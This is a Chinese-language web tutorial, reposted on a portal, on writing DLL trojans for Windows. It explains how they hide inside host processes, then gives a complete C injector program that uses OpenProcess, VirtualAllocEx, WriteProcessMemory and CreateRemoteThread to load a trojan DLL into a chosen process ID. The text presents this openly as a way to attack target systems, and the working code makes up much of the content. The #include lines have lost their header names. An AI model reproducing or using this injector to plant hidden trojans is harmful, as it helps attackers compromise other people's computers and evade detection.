学会用 VC 动态链接库编写 DLL 木马

2008-02-23 07:18:31来源：互联网阅读 ()

DLL在程序编制中可作出巨大贡献，它提供了具共性代码的复用能力。但是，正如一门高深的武学，若被掌握在正义之侠的手上，便可助其仗义江湖；但若被掌握在邪恶之徒的手上，则必然在江湖上掀起腥风血雨。DLL正是一种这样的武学。DLL一旦染上了魔性，就不再是正常的DLL程序，而是DLL木马，一种恶贯满盈的病毒，令特洛伊一夜之间国破家亡。

DLL木马的原理

DLL木马的实现原理是编程者在DLL中包含木马程序代码，随后在目标主机中选择特定目标进程，以某种方式强行指定该进程调用包含木马程序的DLL，最终达到侵袭目标系统的目的。

正是DLL程序自身的特点决定了以这种形式加载木马不仅可行，而且具有良好的隐藏性：

（1）DLL程序被映射到宿主进程的地址空间中，它能够共享宿主进程的资源，并根据宿主进程在目标主机的级别非法访问相应的系统资源；

（2）DLL程序没有独立的进程地址空间，从而可以避免在目标主机中留下"蛛丝马迹"，达到隐蔽自身的目的。

DLL木马实现了"真隐藏"，我们在任务管理器中看不到木马"进程"，它完全溶进了系统的内核。与"真隐藏"对应的是"假隐藏"，"假隐藏"木马把自己注册成为一个服务。虽然在任务管理器中也看不到这个进程，但是"假隐藏"木马本质上还具备独立的进程空间。"假隐藏"只适用于Windows9x的系统，对于基于WINNT的操作系统，通过服务管理器，我们可以发现系统中注册过的服务。

DLL木马注入其它进程的方法为远程线程插入。

远程线程插入技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。将木马程序以DLL的形式实现后，需要使用插入到目标进程中的远程线程将该木马DLL插入到目标进程的地址空间，即利用该线程通过调用Windows API LoadLibrary函数来加载木马DLL，从而实现木马对系统的侵害。

DLL木马注入程序

这里涉及到一个非常重要的Windows API――CreateRemoteThread。与之相比，我们所习惯使用的CreateThread API函数只能在进程自身内部产生一个新的线程，而且被创建的新线程与主线程共享地址空间和其他资源。而CreateRemoteThread则不同，它可以在另外的进程中产生线程！CreateRemoteThread有如下特点：

（1）CreateRemoteThread较CreateThread多一个参数hProcess，该参数用于指定要创建线程的远程进程，其函数原型为：

HANDLE CreateRemoteThread(



HANDLE hProcess, //远程进程句柄



LPSECURITY_ATTRIBUTES lpThreadAttributes,



SIZE_T dwStackSize,



LPTHREAD_START_ROUTINE lpStartAddress,



LPVOID lpParameter,



DWORD dwCreationFlags,



LPDWORD lpThreadId



);

（2）线程函数的代码不能位于我们用来注入DLL木马的进程所在的地址空间中。也就是说，我们不能想当然地自己写一个函数，并把这个函数作为远程线程的入口函数；

（3）不能把本进程的指针作为CreateRemoteThread的参数，因为本进程的内存空间与远程进程的不一样。

以下程序由作者Shotgun的DLL木马注入程序简化而得，它将d盘根目录下的troydll.dll插入到ID为4000的进程中：

#include 



#include 



#include 



void CheckError ( int, int, char *); //出错处理函数



PDWORD pdwThreadId; 



HANDLE hRemoteThread, hRemoteProcess;



DWORD fdwCreate, dwStackSize, dwRemoteProcessId;



PWSTR pszLibFileRemote=NULL;



void main(int argc,char **argv)



{



int iReturnCode;



char lpDllFullPathName[MAX_PATH];



WCHAR pszLibFileName[MAX_PATH]={0};



dwRemoteProcessId = 4000; 



strcpy(lpDllFullPathName, "d:\\troydll.dll");



//将DLL文件全路径的ANSI码转换成UNICODE码



iReturnCode = MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS,



lpDllFullPathName, strlen(lpDllFullPathName),



pszLibFileName, MAX_PATH);



CheckError(iReturnCode, 0, "MultByteToWideChar");



//打开远程进程



hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允许创建线程 



PROCESS_VM_OPERATION | //允许VM操作



PROCESS_VM_WRITE, //允许VM写



FALSE, dwRemoteProcessId ); 



CheckError( (int) hRemoteProcess, NULL, "Remote Process not Exist or Access Denied!");



//计算DLL路径名需要的内存空间



int cb = (1   lstrlenW(pszLibFileName)) * sizeof(WCHAR);



pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb, MEM_COMMIT, 

PAGE_READWRITE);



CheckError((int)pszLibFileRemote, NULL, "VirtualAllocEx");



//将DLL的路径名复制到远程进程的内存空间



iReturnCode = WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (PVOID) 

pszLibFileName, cb, NULL);



CheckError(iReturnCode, false, "WriteProcessMemory");



//计算LoadLibraryW的入口地址 



PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)



GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");



CheckError((int)pfnStartAddr, NULL, "GetProcAddress");



//启动远程线程，通过远程线程调用用户的DLL文件 



hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, 

pszLibFileRemote, 0, NULL);



CheckError((int)hRemoteThread, NULL, "Create Remote Thread");



//等待远程线程退出



WaitForSingleObject(hRemoteThread, INFINITE);



//清场处理



if (pszLibFileRemote != NULL)



{



VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);



}



if (hRemoteThread != NULL) 



{



CloseHandle(hRemoteThread );



}



if (hRemoteProcess!= NULL) 



{



CloseHandle(hRemoteProcess);



}



}



//错误处理函数CheckError()



void CheckError(int iReturnCode, int iErrorCode, char *pErrorMsg)



{



if(iReturnCode==iErrorCode)



{



printf("%s Error:%d\n\n", pErrorMsg, GetLastError());



//清场处理



if (pszLibFileRemote != NULL)



{



VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);



}



if (hRemoteThread != NULL) 



{



CloseHandle(hRemoteThread );



}



if (hRemoteProcess!= NULL)



{



CloseHandle(hRemoteProcess);



}



exit(0);



}



}
			   
			   
                       标签：
                   
                   版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com

特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有

上一篇：黑客自白盗取ADSL账号竟如此简单

下一篇：知己知彼了解VB编写病毒的大体方法

IDC资讯：主机资讯注册资讯托管资讯 vps资讯网站建设

网站运营：建站经验策划盈利搜索优化网站推广免费资源

网站联盟：联盟新闻联盟介绍联盟点评网赚技巧

行业资讯：搜索引擎网络游戏电子商务广告传媒

网络编程： Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它

服务器技术： Web服务器 Ftp服务器 Mail服务器 Dns服务器安全防护

软件技巧：其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷

网页制作： FrontPages Dreamweaver Javascript css photoshop fireworks Flash

程序设计： Java技术 C/C++ VB delphi

网络知识：网络协议网络安全网络管理组网方案 Cisco技术

操作系统： Win2000 WinXP Win2003 Mac OS Linux FreeBSD

热门词条

最新资讯

热门关注

热门标签